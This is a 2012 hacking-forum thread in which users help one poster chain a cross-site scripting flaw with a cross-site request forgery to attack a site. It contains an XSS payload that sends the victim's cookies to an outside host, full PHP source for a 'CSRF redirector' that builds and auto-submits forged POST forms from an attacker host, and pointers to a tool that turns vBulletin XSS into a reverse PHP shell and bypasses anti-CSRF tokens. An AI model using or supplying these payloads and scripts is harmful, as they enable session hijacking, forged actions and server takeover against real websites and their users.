|
Title: CSRF with XSS payload encoding help Post by: eyenit0 on August 02, 2012, 02:13:18 PM Hey everyone,
So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF. Right now my CSRF exploit is just a hidden html form that's auto submitted by javascript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this: value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">" That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multi-part/formdata but no luck. The CSRF vulnerable link will only take POST, not GET. Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an http POST request with Javascript to submit it, but I'm not sure how. Any input is appreciated! Title: Re: CSRF with XSS payload encoding help Post by: unicityd on August 02, 2012, 02:19:07 PM Will any of the URL shortening services accept it?
Title: Re: CSRF with XSS payload encoding help Post by: eyenit0 on August 02, 2012, 11:32:16 PM Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.
Title: Re: CSRF with XSS payload encoding help Post by: unicityd on August 03, 2012, 02:50:15 AM No; they won't work with POST requests. There are other websites that will submit a POST for you though.
http://tomengineering.tripod.com/gettopost.html http://get-to-post.nickj.org/ Title: Re: CSRF with XSS payload encoding help Post by: ambient on November 07, 2012, 01:57:59 AM You could implement it by CSRF redirector technique.
I have posted here but the source code is unavailable. http://pornsookk.wordpress.com/2011/07/08/csrf-redirector/ Code: <html> <title>PHP CSRF Redirector</title> <body> <?php /* Call * http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345 */ $csrf = $_GET['csrf']; $tokens = preg_split('/\?/',$csrf); $url = $tokens[0]; $vars = preg_split('/\|/',$tokens[1]); print ('<form name="csrfForm" method="post" action="' . $url . '">'); for($i=0;$i<sizeof($vars);$i++) { /* $vars[$i]: key=value; * key = terms[0] * value = terms[1] */ $terms = explode('=',$vars[$i]); print('<input type="hidden" name="' . $terms[0] . '" value="' . $terms[1] . '" />'); } //end for loop print("</form>"); ?> <script language="javascript" type="text/javascript"> document.forms[0].submit(); </script> </form> </body> </html> Title: Re: CSRF with XSS payload encoding help Post by: MaXe on November 07, 2012, 02:49:53 AM Take a look at: www.intern0t.org/xssor/ for encoding methods.
Take a look at: http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ for a real world Proof of Concept (and former 0day). The actual tool is available via: http://www.exploit-db.com/sploits/evilwebtool.tar.gz where trojan.js contains the javascript payload. (Note that the python tool reads php code or the reverse php shell (from pentestmonkey) and parses it into the trojan file before serving it. It took some clever encoding, but it works 100% (tested in FireFox) and has been used in a few demo's that I've made. Knowing JavaScript, HTML and attack vectors within these, including various encoding methods, will be sufficient to pull off any XSS attack even defeating Anti-CSRF tokens. The trojan.js file bypasses the built-in CSRF protection in vBulletin as well. ;D It's probably the best PoC that I have ever made hehe
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |